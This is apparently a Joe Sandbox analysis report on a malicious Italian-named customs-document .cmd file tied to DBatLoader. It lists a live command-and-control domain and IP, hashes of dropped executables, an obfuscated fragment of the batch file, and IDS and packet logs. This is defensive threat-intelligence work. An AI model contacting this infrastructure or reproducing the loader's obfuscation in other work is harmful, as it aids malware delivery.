                              https://vandeytas.ru.com/8gAnyDesk.PIF, 00000009.00000003.2048349573.0000000000911000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.2136254211.0000000000911000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://vandeytas.ru.com/=AnyDesk.PIF, 00000009.00000003.2916840538.0000000000912000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
50.7.187.218 | vandeytas.ru.com | United States | 174 | COGENT-174US | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1562927
                              Start date and time:2024-11-26 09:37:49 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 8m 29s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Documentazione_Doganale_richieste_di_copia.cmd
                              Detection:MAL
                              Classification:mal100.bank.troj.evad.winCMD@22/11@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 60
                              • Number of non-executed functions: 204
                              Cookbook Comments:
                              • Found application associated with file extension: .cmd
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: Documentazione_Doganale_richieste_di_copia.cmd
Time | Type | Description
03:38:45 | API Interceptor | 56x Sleep call for process: AnyDesk.PIF modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
50.7.187.218 | orig.eml.exe | malicious | AgentTesla, GuLoader | frsdragoz.za.com/OcrwNAZDnF56.bin
50.7.187.218 | orig.eml.exe | malicious | AgentTesla, GuLoader | frsdragoz.za.com/rXdAJWw196.bin
50.7.187.218 | 3LxMjr9QIE.exe | malicious | GuLoader | nughtofknifes.sa.com/EXuKqCxfBTYzW21.bin
50.7.187.218 | uzFrAkagaX.exe | malicious | AgentTesla, GuLoader | fwegwr.mypi.co/VkWGOQHXLDVTaJQLdaFnQRmo158.bin
50.7.187.218 | SARAY_RECEIPT.exe | malicious | FormBook, GuLoader | fwegwr.mypi.co/gzkFUeaICJGODOkRr58.bin
Match | Associated Sample Name / URL | Detection | Threat Name | Context
vandeytas.ru.com | AnyDesk.exe | malicious | DBatLoader | 50.7.187.218
Match | Associated Sample Name / URL | Detection | Threat Name | Context
COGENT-174US | file.exe | malicious | FormBook, PureLog Stealer | 38.47.233.4
COGENT-174US | AnyDesk.exe | malicious | DBatLoader | 50.7.187.218
COGENT-174US | fbot.sh4.elf | malicious | Mirai, Moobot | 38.57.189.73
COGENT-174US | fbot.x86.elf | malicious | Mirai, Moobot | 38.10.97.97
COGENT-174US | fbot.arm7.elf | malicious | Mirai, Moobot | 154.42.81.20
COGENT-174US | fbot.mips.elf | malicious | Mirai, Moobot | 38.89.2.58
COGENT-174US | ZwmyzMxFKL.exe | malicious | BlackMoon | 206.238.43.118
COGENT-174US | ZwmyzMxFKL.exe | malicious | BlackMoon | 206.238.43.118
COGENT-174US | Payment-251124.exe | malicious | FormBook | 38.181.21.178
COGENT-174US | la.bot.sh4.elf | malicious | Unknown | 154.49.45.52
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger | 50.7.187.218
a0e9f5d64349fb13191bc781f81f42e1 | FHG538JGH835DG86S.doc | malicious | Unknown | 50.7.187.218
a0e9f5d64349fb13191bc781f81f42e1 | RemittanceAdvice35282-17.xll.dll | malicious | Snake Keylogger, VIP Keylogger | 50.7.187.218
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 50.7.187.218
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | Unknown | 50.7.187.218
a0e9f5d64349fb13191bc781f81f42e1 | EPTMAcgvNZ.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 50.7.187.218
a0e9f5d64349fb13191bc781f81f42e1 | AWkpqJMxci.exe | malicious | Remcos, DBatLoader | 50.7.187.218
a0e9f5d64349fb13191bc781f81f42e1 | D2pQ4J4GGZ.exe | malicious | Remcos, DBatLoader | 50.7.187.218
a0e9f5d64349fb13191bc781f81f42e1 | C6dAUcOA6M.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 50.7.187.218
a0e9f5d64349fb13191bc781f81f42e1 | 2jbMIxCFsK.exe | malicious | AgentTesla, DBatLoader | 50.7.187.218
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\Public\alpha.exe | iuhmzvlH.cmd | malicious | Unknown
C:\Users\Public\alpha.exe | USD470900_COPY_800BLHSBC882001.PDF.bat | malicious | Remcos, DBatLoader
C:\Users\Public\alpha.exe | Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
C:\Users\Public\alpha.exe | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer
C:\Users\Public\alpha.exe | #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd | malicious | Unknown
C:\Users\Public\alpha.exe | #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd | malicious | DBatLoader, FormBook
C:\Users\Public\alpha.exe | TZH3Uk8x45.bat | malicious | DBatLoader, PureLog Stealer, XWorm
C:\Users\Public\alpha.exe | Payment.cmd | malicious | Azorult, DBatLoader
C:\Users\Public\alpha.exe | FACTURA.cmd | malicious | DBatLoader
C:\Users\Public\alpha.exe | rPO767575.cmd | malicious | DBatLoader
                                                  Process:C:\Users\Public\kn.exe
                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2599938
                                                  Entropy (8bit):3.876063806380312
                                                  Encrypted:false
                                                  SSDEEP:24576:JfAknAtx79WW+D6xeupltkImnd7ewXLSueiC2wq1q4CPcsq8/q7LGtFHaVHtpdMg:F
                                                  MD5:249B8941E9BE56A05F2506BD021F97C0
                                                  SHA1:9719003F93839AA45568CF9AE911DDE3745E1CE6
                                                  SHA-256:43BE45CCA8380F82BFA444FCFC3F36223068F008CF552628CEB26858CEBE8B9B
                                                  SHA-512:420B1741E91984259C8527792E278E9880D842BB27AEED35F16EEACA04F6EA2EC186F3C7273F502CA31B8DB00D5FFA37B6A4E135BC6C57A9B4DEC79E152E7EF8
                                                  Malicious:false
                                                  Process:C:\Users\Public\kn.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1299968
                                                  Entropy (8bit):7.222011374672291
                                                  Encrypted:false
                                                  SSDEEP:24576:Ien4s+Jv82wO5m5jAyTgz1Camim9U/ZxvneUy6/1D+TzxF1Yb:IG+cc5z1CadUUXtSTr
                                                  MD5:BCEEA9753420A675AF68CDA43864438E
                                                  SHA1:0823F156DA4F106A26B5738CF9F732D5DD68CDD8
                                                  SHA-256:B6A6A59C8B8387233BE03BB2111830D4E8AAFEC6A62A290090AE75CBFF5736EC
                                                  SHA-512:8DCD35BE032E853BC785615E63993DEB71FA2EF35A20DB9427C2A281F20EA4768B3754B4887D212CC5867EE36E470D47E33A7333CC9CA0A22196FF8371E51490
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 68%
                                                  Process:C:\Windows\System32\extrac32.exe
                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                  Category:modified
                                                  Size (bytes):289792
                                                  Entropy (8bit):6.135598950357573
                                                  Encrypted:false
                                                  SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                  MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                  SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                  SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
• Filename: iuhmzvlH.cmd, Detection: malicious
• Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious
• Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious
• Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious
• Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious
• Filename: TZH3Uk8x45.bat, Detection: malicious
• Filename: Payment.cmd, Detection: malicious
• Filename: FACTURA.cmd, Detection: malicious
• Filename: rPO767575.cmd, Detection: malicious
                                                  Process:C:\Windows\System32\extrac32.exe
                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                  Category:modified
                                                  Size (bytes):1651712
                                                  Entropy (8bit):6.144018815244304
                                                  Encrypted:false
                                                  SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                  MD5:F17616EC0522FC5633151F7CAA278CAA
                                                  SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                  SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                  SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Process:C:\Users\Public\alpha.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):104
                                                  Entropy (8bit):4.403504238247217
                                                  Encrypted:false
                                                  SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                                  MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                                  SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                                  SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                                  SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                                  Malicious:false
                                                  Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...
                                                  File type:Unicode text, UTF-8 text, with very long lines (468), with CRLF line terminators
                                                  Entropy (8bit):4.949900634415472
                                                  TrID:
                                                    File name:Documentazione_Doganale_richieste_di_copia.cmd
                                                    File size:3'584'667 bytes
                                                    MD5:e83eaefa47746764ed0708da11cf890f
                                                    SHA1:5986d2e1da1d6fa42825ae627ee688cac4530fd7
                                                    SHA256:13e2c237c2fa5b146ada50ad1be0be71832e42b745f2bc82daa52558807a7aa6
                                                    SHA512:d69fe44a64af8693c5d15dcc0d3773e3b30da540f90be0ba3addd1bbcf99c26632572f1a4eccf1838ac60da4e0d27b5700a4ebeeac8448f3c822e67399a9d251
                                                    SSDEEP:49152:f6DzaZKYLJqhTLqP8gTM0BiuWSIRbWRIi9b:v
                                                    TLSH:EBF530ABA9AE2685330427FF774FA9084A17DCD52A837FC402C617BCD41A64F1BD09D9
                                                    File Content Preview:@%..%e%.. .. .. ..%c%..%h%........ ........ %o% ..........% %......%o%.......... %f% %f%....%..s%..................... r%e%...%t%.................. ...% %............%"%............%H%... %R%....... ...%T%.......%w%.........o......%=% ......... ..........
                                                    Icon Hash:9686878b929a9886
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-26T09:38:48.563344+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 50.7.187.218 | 443 | TCP
2024-11-26T09:38:50.754265+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 50.7.187.218 | 443 | TCP
2024-11-26T09:38:52.954772+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 50.7.187.218 | 443 | TCP
2024-11-26T09:38:55.168909+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 50.7.187.218 | 443 | TCP
2024-11-26T09:38:57.281145+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49739 | 50.7.187.218 | 443 | TCP
2024-11-26T09:38:59.839817+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49741 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:02.030386+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49744 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:04.491017+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49748 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:06.616914+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49752 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:08.762801+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49755 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:10.894037+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49757 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:12.993224+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49759 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:15.086047+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49761 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:17.307750+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49763 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:19.539915+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49765 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:21.686683+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49767 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:23.870915+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49769 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:26.009878+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49771 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:28.366489+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49773 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:30.558807+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49775 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:32.727424+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49777 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:34.821873+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49779 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:36.950461+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49781 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:39.147343+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49783 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:41.275676+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49785 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:43.417014+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49789 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:45.739224+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49796 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:47.925418+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49803 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:50.066597+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49810 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:52.161402+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49817 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:54.280482+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49824 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:56.417637+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49831 | 50.7.187.218 | 443 | TCP
2024-11-26T09:39:58.550142+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49838 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:00.801176+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49845 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:02.950972+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49852 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:05.091745+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49859 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:07.254696+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49866 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:09.425427+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49870 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:11.592526+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49876 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:13.726668+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49881 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:15.936904+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49887 | 50.7.187.218 | 443 | TCP
2024-11-26T09:40:18.061957+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49894 | 50.7.187.218 | 443 | TCP
                                                    2024-11-26T09:40:20.180941+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44990050.7.187.218443TCP
                                                    2024-11-26T09:40:22.438790+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44990750.7.187.218443TCP
                                                    2024-11-26T09:40:24.742215+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44991450.7.187.218443TCP
                                                    2024-11-26T09:40:26.861374+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44992150.7.187.218443TCP
                                                    2024-11-26T09:40:29.007334+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44992850.7.187.218443TCP
                                                    2024-11-26T09:40:31.208417+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44993550.7.187.218443TCP
                                                    2024-11-26T09:40:33.341234+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44994250.7.187.218443TCP
                                                    2024-11-26T09:40:35.405275+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44994950.7.187.218443TCP
                                                    2024-11-26T09:40:37.498236+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44995550.7.187.218443TCP
                                                    2024-11-26T09:40:39.661000+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44996250.7.187.218443TCP
                                                    2024-11-26T09:40:42.015913+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44996950.7.187.218443TCP
                                                    2024-11-26T09:40:44.180953+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44997650.7.187.218443TCP
                                                    2024-11-26T09:40:46.387362+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44998350.7.187.218443TCP
                                                    2024-11-26T09:40:48.493864+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44999050.7.187.218443TCP
                                                    Nov 26, 2024 09:39:09.281500101 CET49755443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:09.281506062 CET4434975550.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:09.472891092 CET49756443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:09.472949028 CET4434975650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:09.473059893 CET49756443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:09.473313093 CET49756443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:09.473392010 CET4434975650.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:09.473478079 CET49756443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:09.483397007 CET49757443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:09.483464956 CET4434975750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:09.483582020 CET49757443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:09.484061003 CET49757443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:09.484072924 CET4434975750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:10.893903971 CET4434975750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:10.894037008 CET49757443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:10.895529032 CET49757443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:10.895536900 CET4434975750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:10.895778894 CET4434975750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:10.905518055 CET49757443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:10.947325945 CET4434975750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:11.412820101 CET4434975750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:11.412900925 CET4434975750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:11.412966967 CET49757443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:11.413295984 CET49757443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:11.413314104 CET4434975750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:11.413325071 CET49757443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:11.413331032 CET4434975750.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:11.603528023 CET49758443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:11.603590012 CET4434975850.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:11.603753090 CET49758443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:11.603944063 CET49758443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:11.603988886 CET4434975850.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:11.604053020 CET49758443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:11.629492998 CET49759443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:11.629535913 CET4434975950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:11.629616976 CET49759443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:11.630037069 CET49759443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:11.630047083 CET4434975950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:12.993158102 CET4434975950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:12.993223906 CET49759443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:12.999149084 CET49759443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:12.999161959 CET4434975950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:12.999437094 CET4434975950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:13.001260996 CET49759443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:13.043344021 CET4434975950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:13.502410889 CET4434975950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:13.502487898 CET4434975950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:13.502607107 CET49759443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:13.503021955 CET49759443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:13.503036976 CET4434975950.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:13.710017920 CET49760443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:13.710064888 CET4434976050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:13.710136890 CET49760443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:13.710256100 CET49760443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:13.710529089 CET4434976050.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:13.710577965 CET49760443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:13.719620943 CET49761443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:13.719666958 CET4434976150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:13.719733953 CET49761443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:13.720324993 CET49761443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:13.720336914 CET4434976150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:15.085920095 CET4434976150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:15.086046934 CET49761443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:15.087579966 CET49761443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:15.087591887 CET4434976150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:15.088229895 CET4434976150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:15.091170073 CET49761443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:15.131365061 CET4434976150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:15.599057913 CET4434976150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:15.599138975 CET4434976150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:15.599196911 CET49761443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:15.603632927 CET49761443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:15.603667021 CET4434976150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:15.603677988 CET49761443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:15.603686094 CET4434976150.7.187.218192.168.2.4
                                                    Nov 26, 2024 09:39:15.809094906 CET49762443192.168.2.450.7.187.218
                                                    Nov 26, 2024 09:39:15.809142113 CET4434976250.7.187.218192.168.2.4
